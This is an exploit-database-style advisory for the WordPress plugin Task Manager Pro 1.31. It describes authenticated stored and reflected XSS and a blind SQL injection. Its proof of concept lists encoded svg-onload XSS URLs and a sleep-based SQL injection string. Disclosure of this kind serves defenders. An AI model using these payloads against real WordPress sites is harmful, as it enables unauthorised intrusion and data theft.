# Exploit Title: WordPress Task Manager Pro 1.31 - Multiple vulnerabilities # Date: 2017-07-11 # Exploit Author: 8bitsec # Vendor Homepage: https://www.w3bd.com/ # Software Link: http://codecanyon.net/item/task-manager-pro-all-in-one-project-based-task-management-plugin-for-wordrpress/19864872 # Version: 1.31 # Tested on: [Kali Linux 2.0 | Mac OS 10.12.5] # Email: contact@8bitsec.io # Contact: https://twitter.com/_8bitsec Release Date: ============= 2017-07-11 Product & Service Introduction: =============================== Task Manager Pro is a full and functional task management plugin for wordpress. Vulnerability Disclosure Timeline: ================================== 2017-07-10: Found the vulnerabilities. 2017-07-10: Reported to vendor. 2017-07-11: No response. 2017-07-11: Published. Technical Details & Description: ================================ Multiple authenticated XSS vulnerabilities found logged as a low privileged user. Blind SQL Injection on task-details page task parameter. Proof of Concept (PoC): ======================= Authenticated Stored XSS: Logged as a follower, the lowest privileged user. Write the payload in the 'Add a comment' section Authenticated Reflected XSS On task-edit, task-details, project-details pages: https://localhost/wp-admin/admin.php?page=task-edit&task=8%2F%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E https://localhost/wp-admin/admin.php?page=task-details&task=6%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E https://localhost/wp-admin/admin.php?page=project-details&project=%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E Authenticated Stored XSS Logged as a user with edit privileges: Edit Task Section. Task Name & Time Estimation fields are vulnerable. Blind SQL Injection Logged as a follower: # 6 and sleep(1) and 1=1 https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep(1)+and+1%3D1 Credits & Authors: ================== 8bitsec - [https://twitter.com/_8bitsec]